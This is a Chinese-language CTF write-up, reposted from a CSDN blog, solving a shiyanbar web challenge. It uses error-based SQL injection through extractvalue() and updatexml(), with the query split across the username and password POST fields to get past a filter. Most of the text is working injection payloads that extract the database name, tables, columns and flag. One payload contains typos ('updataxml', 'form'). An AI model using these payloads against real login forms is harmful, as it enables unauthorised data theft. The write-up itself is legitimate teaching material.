题目链接: http://ctf5.shiyanbar.com/web/baocuo/index.php
在这题试过挺多种方法,最终网上学了两种方法,分别是extractvalue()报错注入和updatexml()报错注入,两种方法感觉都不错,但是两个都会被长度限制,最长是32位。
有题目可以看出是用post来传递参数,
构造post参数测试尝试一下直接注入:username=1’ &password= or’1。
fuzz一下,发现extractvalue()和updatexml没有被过滤掉
extractvalue()报错注入
原理:原理:xpath 函数报错注入
记得sql语句吗? where username=’???’ and password=’???’ 而sql语句中可以使用/ * * /注释掉中间的SQL语句。也就是说,我们可以使用 / * * /来解决这个问题,而且/* */也没有被吃掉,这叫做HTTP分割注入。构造语句
username='or extractvalue /*&password=*/(1,concat(0x5c,(select database()))) or'
爆出了库名
接下来就是要报错出表名,需要注意一点,就是=是被过滤掉了的,可以用in或者regexp代替
username='or extractvalue /*&password=*/(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema regexp 'error_based_hpf'))) or'
爆出表名
然后是字段名(列名)
username='or extractvalue /*&password=*/(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_name regexp 'ffll44jj'))) or'
爆出了列名
getflag
username='or extractvalue/*&password=*/(1,concat(0x5c,(select value from ffll44jj))) or'
updatexml()报错注入
updatexml()报错注入跟上面的挺像的,就是构造的有点不一样
首先要爆库名:
username=1' and updatexml/*&password=*/(1,concat(0x7e,(select database()),0x7e),1) or'1
爆表名
username=1' and updatexml/*&password=*/(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where !(table_schema<>'error_based_hpf')),0x7e),3) or'
爆列名
username=1' and updataxml /*&password=*/(1,concat(0x7e,(select group_concat(column_name) form information_schema.columns where !(table_name<>'ffll44jj')),0x7e),3) or'1
getflag:
username=1' and updatexml/*&password=*/(1,concat(0x7e,(select value from ffll44jj),0x7e),3) or'1
来源:CSDN
作者:fzykn06
链接:https://blog.csdn.net/fzykn06/article/details/89176899